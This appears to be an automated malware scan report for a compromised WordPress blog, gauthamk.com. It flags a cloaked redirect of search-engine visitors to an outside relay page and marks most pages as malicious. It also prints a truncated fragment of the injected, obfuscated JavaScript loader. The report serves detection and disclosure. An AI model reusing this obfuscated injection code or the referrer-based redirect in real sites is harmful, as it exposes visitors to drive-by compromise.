Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.gauthamk.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.gauthamk.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 31 Aug 2014 06:00:20 GMT Location: http://jchauto.pl/relay.php Server: Apache Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.gauthamk.com/ | 200 OK Content-Length: 9608 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
http://www.gauthamk.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201435.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://www.gauthamk.com/sample-page/ | 200 OK Content-Length: 8968 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://www.gauthamk.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 31 Aug 2014 06:00:24 GMT Pragma: no-cache Location: http://www.gauthamk.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.gauthamk.com%2Fwp-admin%2F&reauth=1 Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 31 Aug 2014 06:00:25 GMT | clean |
http://www.gauthamk.com/wp-login.php?redirect_to=http%3a%2f%2fwww.gauthamk.com%2fwp-admin%2f&reauth=1 | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://www.gauthamk.com/test404page.js | 404 Not Found Content-Length: 7739 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://www.gauthamk.com/2011/07/06/book-of-speed/ | 200 OK Content-Length: 11057 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://www.gauthamk.com/tag/page-performance/ | 200 OK Content-Length: 9088 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://www.gauthamk.com/category/web-performance/ | 200 OK Content-Length: 9095 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://www.gauthamk.com/2011/06/29/hello-world/ | 200 OK Content-Length: 10157 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://www.gauthamk.com/category/uncategorized/ | 200 OK Content-Length: 8239 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gauthamk.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gauthamk.com/
Result: gauthamk.com is not infected or malware details are not published yet.